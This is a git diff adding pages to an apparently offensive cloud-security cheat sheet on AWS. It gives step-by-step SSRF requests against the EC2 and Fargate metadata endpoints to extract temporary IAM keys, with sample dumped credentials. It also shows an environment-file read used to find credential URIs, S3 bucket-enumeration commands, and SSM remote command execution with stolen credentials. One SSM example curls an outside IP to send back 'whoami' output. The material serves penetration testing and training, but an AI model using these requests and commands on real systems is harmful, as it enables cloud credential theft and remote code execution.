iam/ + identity-credentials/ + instance-action + instance-id + ``` +2. Find the name of the role assigned to the instance : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/ +3. Extract the role's temporary keys : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/ + ```powershell + { + "Code" : "Success", + "LastUpdated" : "2019-07-31T23:08:10Z", + "Type" : "AWS-HMAC", + "AccessKeyId" : "ASIA54BL6PJR37YOEP67", + "SecretAccessKey" : "OiAjgcjm1oi2xxxxxxxxOEXkhOMhCOtJMP2", + "Token" : "AgoJb3JpZ2luX2VjEDU86Rcfd/34E4rtgk8iKuTqwrRfOppiMnv", + "Expiration" : "2019-08-01T05:20:30Z" + } + ``` + + +## Method for Container Service (Fargate) + +1. Fetch the AWS_CONTAINER_CREDENTIALS_RELATIVE_URI variable from https://awesomeapp.com/download?file=/proc/self/environ + ```powershell + JAVA_ALPINE_VERSION=8.212.04-r0 + HOSTNAME=bbb3c57a0ed3SHLVL=1PORT=8443HOME=/root + AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/d22070e0-5f22-4987-ae90-1cd9bec3f447 + AWS_EXECUTION_ENV=AWS_ECS_FARGATEMVN_VER=3.3.9JAVA_VERSION=8u212AWS_DEFAULT_REGION=us-west-2 + ECS_CONTAINER_METADATA_URI=http://169.254.170.2/v3/cb4f6285-48f2-4a51-a787-67dbe61c13ffPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/bin:/usr/lib/mvn:/usr/lib/mvn/binLANG=C.UTF-8AWS_REGION=us-west-2Tag=48111bbJAVA_HOME=/usr/lib/jvm/java-1.8-openjdk/jreM2=/usr/lib/mvn/binPWD=/appM2_HOME=/usr/lib/mvnLD_LIBRARY_PATH=/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64/server:/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64:/usr/lib/jvm/java-1.8-openjd + ``` +2. Use the credential URL to dump the AccessKey and SecretKey : https://awesomeapp.com/forward?target=http://169.254.170.2/v2/credentials/d22070e0-5f22-4987-ae90-1cd9bec3f447 + ```powershell + { + "RoleArn": "arn:aws:iam::953574914659:role/awesome-waf-role", + "AccessKeyId": "ASIA54BL6PJR2L75XHVS", + "SecretAccessKey": "j72eTy+WHgIbO6zpe2DnfjEhbObuTBKcemfrIygt", + "Token": "FQoGZXIvYXdzEMj//////////wEaDEQW+wwBtaoyqH5lNSLGBF3PnwnLYa3ggfKBtLMoWCEyYklw6YX85koqNwKMYrP6ymcjv4X2gF5enPi9/Dx6m/1TTFIwMzZ3tf4V3rWP3HDt1ea6oygzTrWLvfdp57sKj+2ccXI+WWPDZh3eJr4Wt4JkiiXrWANn7Bx3BUj9ZM11RXrKRCvhrxdrMLoewRkWmErNEOFgbaCaT8WeOkzqli4f+Q36ZerT2V+FJ4SWDX1CBsimnDAMAdTIRSLFxVBBwW8171OHiBOYAMK2np1xAW1d3UCcZcGKKZTjBee2zs5+Rf5Nfkoq+j7GQkmD2PwCeAf0RFETB5EVePNtlBWpzfOOVBtsTUTFewFfx5cyNsitD3C2N93WR59LX/rNxyncHGDUP/6UPlasOcfzAaG738OJQmWfQTR0qksHIc2qiPtkstnNndh76is+r+Jc4q3wOWu2U2UBi44Hj+OS2UTpMAwc/MshIiGsUOrBQdPqcLLdAxKpUNTdSQNLg5wv4f2OrOI8/sneV58yBRolBz8DZoH8wohtLXpueDt8jsVSVLznnMOOe/4ehHE2Nt+Fy+tjaY5FUi/Ijdd5IrIdIvWFHY1XcPopUFYrDqr0yuZvX1YddfIcfdbmxf274v69FuuywXTo7cXk1QTMYZWlD/dPI/k6KQeO446UrHT9BJxcJMpchAIVRpI7nVKkSDwku1joKUG7DOeycuAbhecVZG825TocL0ks2yXPnIdvckAaU9DZf+afIV3Nxv3TI4sSX1npBhb2f/8C31pv8VHyu2NiN5V6OOHzZijHsYXsBQ==", + "Expiration": "2019-09-18T04:05:59Z" + } + ``` + + +## AWS API calls that return credentials + +- chime:createapikey +- [codepipeline:pollforjobs](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html) +- [cognito-identity:getopenidtoken](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdToken.html) +- [cognito-identity:getopenidtokenfordeveloperidentity](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdTokenForDeveloperIdentity.html) +- [cognito-identity:getcredentialsforidentity](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetCredentialsForIdentity.html) +- [connect:getfederationtoken](https://docs.aws.amazon.com/connect/latest/APIReference/API_GetFederationToken.html) +- [connect:getfederationtokens](https://docs.aws.amazon.com/connect/latest/APIReference/API_GetFederationToken.html) +- [ecr:getauthorizationtoken](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/API_GetAuthorizationToken.html) +- [gamelift:requestuploadcredentials](https://docs.aws.amazon.com/gamelift/latest/apireference/API_RequestUploadCredentials.html) +- [iam:createaccesskey](https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateAccessKey.html) +- [iam:createloginprofile](https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateLoginProfile.html) +- [iam:createservicespecificcredential](https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateServiceSpecificCredential.html) +- [iam:resetservicespecificcredential](https://docs.aws.amazon.com/IAM/latest/APIReference/API_ResetServiceSpecificCredential.html) +- [iam:updateaccesskey](https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateAccessKey.html) +- [lightsail:getinstanceaccessdetails](https://docs.aws.amazon.com/lightsail/2016-11-28/api-reference/API_GetInstanceAccessDetails.html) +- [lightsail:getrelationaldatabasemasteruserpassword](https://docs.aws.amazon.com/lightsail/2016-11-28/api-reference/API_GetRelationalDatabaseMasterUserPassword.html) +- [rds-db:connect](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.IAMPolicy.html) +- [redshift:getclustercredentials](https://docs.aws.amazon.com/redshift/latest/APIReference/API_GetClusterCredentials.html) +- [sso:getrolecredentials](https://docs.aws.amazon.com/singlesignon/latest/PortalAPIReference/API_GetRoleCredentials.html) +- [mediapackage:rotatechannelcredentials](https://docs.aws.amazon.com/mediapackage/latest/apireference/channels-id-credentials.html) +- [mediapackage:rotateingestendpointcredentials](https://docs.aws.amazon.com/mediapackage/latest/apireference/channels-id-ingest_endpoints-ingest_endpoint_id-credentials.html) +- [sts:assumerole](https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role.html) +- [sts:assumerolewithsaml](https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role-with-saml.html) +- [sts:assumerolewithwebidentity](https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role-with-web-identity.html) +- [sts:getfederationtoken](https://docs.aws.amazon.com/cli/latest/reference/sts/get-federation-token.html) +- [sts:getsessiontoken](https://docs.aws.amazon.com/cli/latest/reference/sts/get-session-token.html) + + +## References + +* [AWS API calls that return credentials - kmcquade](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) +* [Cloud security instance metadata - PumaScan - Eric Johnson - 09 Oct 2019](https://pumascan.com/resources/cloud-security-instance-metadata/) \ No newline at end of file diff --git a/docs/cloud/aws/aws-s3-bucket.md b/docs/cloud/aws/aws-s3-bucket.md new file mode 100644 index 0000000..d4e6589 --- /dev/null +++ b/docs/cloud/aws/aws-s3-bucket.md @@ -0,0 +1,41 @@ +# AWS - S3 Buckets + +## Tools + +* [digi.ninja/bucket-finder](https://digi.ninja/projects/bucket_finder.php) - Search for public buckets, list and download all files if directory indexing is enabled + ```powershell + wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2 + ./bucket_finder.rb my_words + ./bucket_finder.rb --region ie my_words + ./bucket_finder.rb --download --region ie my_words + ./bucket_finder.rb --log-file bucket.out my_words + ``` + +* [aws-sdk/boto3](https://boto3.amazonaws.com/v1/documentation/api/latest/index.html) - Amazon Web Services (AWS) SDK for Python + ```python + import boto3 + s3 = boto3.client('s3',aws_access_key_id='AKIAJQDP3RKREDACTED',aws_secret_access_key='igH8yFmmpMbnkcUaCqXJIRIozKVaREDACTED',region_name='us-west-1') + + try: + result = s3.list_buckets() + print(result) + except Exception as e: + print(e) + ``` + +* [nccgroup/s3_objects_check](https://github.com/nccgroup/s3_objects_check) - Whitebox evaluation of effective S3 object permissions, to identify publicly accessible files + ```powershell + $ python3 -m venv env && source env/bin/activate + $ pip install -r requirements.txt + $ python s3-objects-check.py -h + $ python s3-objects-check.py -p whitebox-profile -e blackbox-profile + ``` + + +## + + + +## References + +* []() \ No newline at end of file diff --git a/docs/cloud/aws/aws-ssm.md b/docs/cloud/aws/aws-ssm.md new file mode 100644 index 0000000..ebc8aaa --- /dev/null +++ b/docs/cloud/aws/aws-ssm.md @@ -0,0 +1,29 @@ +# AWS - SSM + +## Command execution + +:warning: The ssm-user account is not removed from the system when SSM Agent is uninstalled. + +SSM Agent is preinstalled, by default, on the following Amazon Machine Images (AMIs): + +* Windows Server 2008-2012 R2 AMIs published in November 2016 or later +* Windows Server 2016 and 2019 +* Amazon Linux +* Amazon Linux 2 +* Ubuntu Server 16.04 +* Ubuntu Server 18.04 +* Amazon ECS-Optimized + +```powershell +$ aws ssm describe-instance-information --profile stolencreds --region eu-west-1 +$ aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds +$ aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds + +e.g: +$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1 +``` + + +## References + +* []() \ No newline at end of file diff --git a/docs/cloud/aws/aws-training.md b/docs/cloud/aws/aws-training.md new file mode 100644 index 0000000..47c9993 --- /dev/null +++ b/docs/cloud/aws/aws-training.md @@ -0,0 +1,8 @@ +# AWS - Training + +* [bishopfox/CloudFoxable](https://cloudfoxable.bishopfox.com/): A Gamified Cloud Hacking Sandbox +* [ine-labs/AWSGoat](https://github.com/ine-labs/AWSGoat) : A Damn Vulnerable AWS Infrastructure +* [m6a-UdS/dvca](https://github.com/m6a-UdS/dvca) - A demonstration project to show how to do privilege escalation on AWS +* [nccgroup/sadcloud](https://github.com/nccgroup/sadcloud) - A tool for standing up (and tearing down!) purposefully insecure cloud infrastructure +* [0xdabbad00/Flaws](http://flaws.cloud) - Several level of challenges around AWS +* [RhinoSecurityLabs/cloudgoat](https://github.com/RhinoSecurityLabs/cloudgoat) - "Vulnerable by Design" AWS deployment tool \ No newline at end of file diff --git a/docs/cloud/azure/azure-ad-connect.md b/docs/cloud/azure/azure-ad-connect.md index ff9bfd7..2fc0d52 100644 --- a/docs/cloud/azure/azure-ad-connect.md +++ b/docs/cloud/azure/azure-ad-connect.md @@ -120,4 +120,5 @@ Using [https://autologon.microsoftazuread-sso.com/](https://autologon.microsofta * [Azure AD Overview - John Savill's Technical Training - Oct 7, 2014](https://www.youtube.com/watch?v=l_pnNpdxj20) * [Windows Azure Active Directory in plain English - Openness AtCEE - Jan 9, 2014](https://www.youtube.com/watch?v=IcSATObaQZE) * [Azure AD connect for RedTeam - Adam Chester @xpnsec - 2019-02-18](https://blog.xpnsec.com/azuread-connect-for-redteam/) -* [Azure AD Kerberos Tickets: Pivoting to the Cloud - Edwin David - February 09, 2023](https://trustedsec.com/blog/azure-ad-kerberos-tickets-pivoting-to-the-cloud) \ No newline at end of file +* [Azure AD Kerberos Tickets: Pivoting to the Cloud - Edwin David - February 09, 2023](https://trustedsec.com/blog/azure-ad-kerberos-tickets-pivoting-to-the-cloud) +* [DUMPING NTHASHES FROM MICROSOFT ENTRA ID - Secureworks](https://www.secureworks.com/research/dumping-nthashes-from-microsoft-entra-id) \ No newline at end of file